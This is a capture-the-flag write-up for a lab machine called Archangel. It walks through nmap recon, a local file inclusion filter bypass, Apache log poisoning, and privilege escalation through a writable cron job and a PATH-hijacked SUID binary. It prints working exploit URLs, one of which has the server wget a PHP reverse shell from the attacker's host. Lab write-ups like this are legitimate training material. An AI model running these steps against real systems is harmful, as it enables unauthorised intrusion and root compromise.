This documents my adventures through Archangel. Note that the target IP address changes a few times due to restarts.
Phase 1: recon
The first step taken was to run nmap. The results only showed us two open ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f1d2c9d6ca40e4640506fedcf1cf38c (RSA)
| 256 637327c76104256a08707a36b2f2840d (ECDSA)
|_ 256 b64ed29c3785d67653e8c4e0481cae6c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wavefire
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:BD:CD:C2:DA:BD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The first protocol analyzed was HTTP.
There was little to see there, although support@mafialive.thm hinted at a domain name. At the time I also thought it might be a username.
We put mafialive.thm into our hosts file and then began enumerating directories.
With this we found our first flag. It totally didn’t redirect to a Rickroll, and I most definitely did not fall for it.
Investigating mafialive.thm we found a new website.
We enumerated the directories here, and this time found something very useful.
The new directory found was called test.php.
We investigated the button, and notice the new URL.
We used a number of payloads from https://github.com/payloadbox/rfi-lfi-payload-list in order to find a way to take advantage of the ?view= part of the URL.
Recalling that php code sometimes can’t be printed to our web browser, we used an alternative route to get access to the source code: printing base64 encoded PHP.
The payload used:
Switching out the file being revealed, we gained access to the PHP code for the site.
Phase 2: exploitation
The code here whitelists requests that include /var/www/html/development_testing and blacklists requests with ../.. .
These can both be bypassed by using ..//.. , which is treated as the same as ../.. by the server, and including the filepath.
http://mafialive.thm/test.php?view=/var/www/html/development_testing..//..//..//..//..//etc/passwd allows us to leak users.
Log files were found accessible, pointing to a log poisoning vulnerability. This, in short, is a vulnerability in which we inject our own code into a log file, and the log file will read it.
I attempted to open a shell directly from the URL, but found it simpler to upload a PHP shell. For this, an http server must host the shell.
http://mafialive.thm/test.php?view=/var/www/html/development_testing..//..//..//..//..//var/log/apache2/access.log&cmd=wget http://10.10.189.242:8000/rev.php
Looking at our listener, we saw a connection when we navigated to the web shell: http://mafialive.thm/rev.php
Phase 3: escalation
The first step taken was enumerating the local system. This was done with linpeas.
What we discovered here was a cron file run as archangel that has universal write. Modifying this, and opening a listener, we were able to gain a shell with elevated privileges.
Here we gained a shell as archangel. The next step is to look for a way to root access.
We discovered an executable with the SUID bit set, which we can run, but cannot modify.
The file calls the cp command. The way to root was by using the PATH variable. The gist of what we did is that we created our own cp executable which spawns a shell (executes /bin/bash), then ensured that the system runs our cp instead of the actual one. This is done by changing the path that our system uses to decide which executable to run.
With that, we have achieved root level access and pwned the machine!